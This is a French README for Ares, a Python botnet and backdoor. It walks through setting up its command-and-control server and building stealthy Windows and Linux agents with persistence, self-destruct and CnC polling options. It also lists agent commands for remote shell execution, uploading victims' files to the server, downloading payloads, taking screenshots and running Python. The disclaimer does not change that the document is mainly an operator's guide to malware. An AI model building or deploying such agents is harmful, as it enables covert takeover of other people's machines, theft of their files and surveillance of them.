
Botnet et backdoor Python
Ares est un outil d'accès à distance en Python.
Avertissement : Utilisez ce logiciel uniquement conformément à votre législation en vigueur. Une mauvaise utilisation de ce logiciel peut soulever des problèmes juridiques et éthiques que je ne soutiens pas et dont je ne peux être tenu responsable.
Ares est composé de deux programmes principaux :
L'interface Web peut être exécutée sur n'importe quel serveur utilisant Python. L'agent peut être compilé en exécutables natifs en utilisant pyinstaller.
Installez les dépendances Python :
pip install -r requirements.txt
Initialisez la base de données :
cd server
./ares.py initdb
Pour compiler des agents Windows sous Linux, configurez wine (optionnel) :
./wine_setup.sh
Exécutez avec le serveur intégré (debug) :
./ares.py runserver -h 0.0.0.0 -p 8080 --threaded
Ou exécutez avec gunicorn :
gunicorn ares:app -b 0.0.0.0:8080 --threads 20
Le serveur devrait maintenant être accessible sur http://localhost:8080
Exécutez l'agent Python (mettez à jour config.py selon vos besoins) :
cd agent
./agent.py
Construisez un nouvel agent en un binaire autonome :
./builder.py -p Linux --server http://localhost:8080 -o agent
./agent
Pour voir la liste des options supportées, exécutez ./builder.py -h
./agent/builder.py -h
usage: builder.py [-h] -p PLATFORM --server SERVER -o OUTPUT
[--hello-interval HELLO_INTERVAL] [--idle_time IDLE_TIME]
[--max_failed_connections MAX_FAILED_CONNECTIONS]
[--persistent]
Builds an Ares agent.
optional arguments:
-h, --help show this help message and exit
-p PLATFORM, --platform PLATFORM
Target platform (Windows, Linux).
--server SERVER Address of the CnC server (e.g http://localhost:8080).
-o OUTPUT, --output OUTPUT
Output file name.
--hello-interval HELLO_INTERVAL
Delay (in seconds) between each request to the CnC.
--idle_time IDLE_TIME
Inactivity time (in seconds) after which to go idle.
In idle mode, the agent pulls commands less often
(every <hello_interval> seconds).
--max_failed_connections MAX_FAILED_CONNECTIONS
The agent will self destruct if no contact with the
CnC can be made <max_failed_connections> times in a
row.
--persistent Automatically install the agent on first run.
<any shell command>
Executes the command in a shell and return its output.
upload <local_file>
Uploads <local_file> to server.
download <url> <destination>
Downloads a file through HTTP(S).
zip <archive_name> <folder>
Creates a zip archive of the folder.
screenshot
Takes a screenshot.
python <command|file>
Runs a Python command or local file.
persist
Installs the agent.
clean
Uninstalls the agent.
exit
Kills the agent.
help
This help.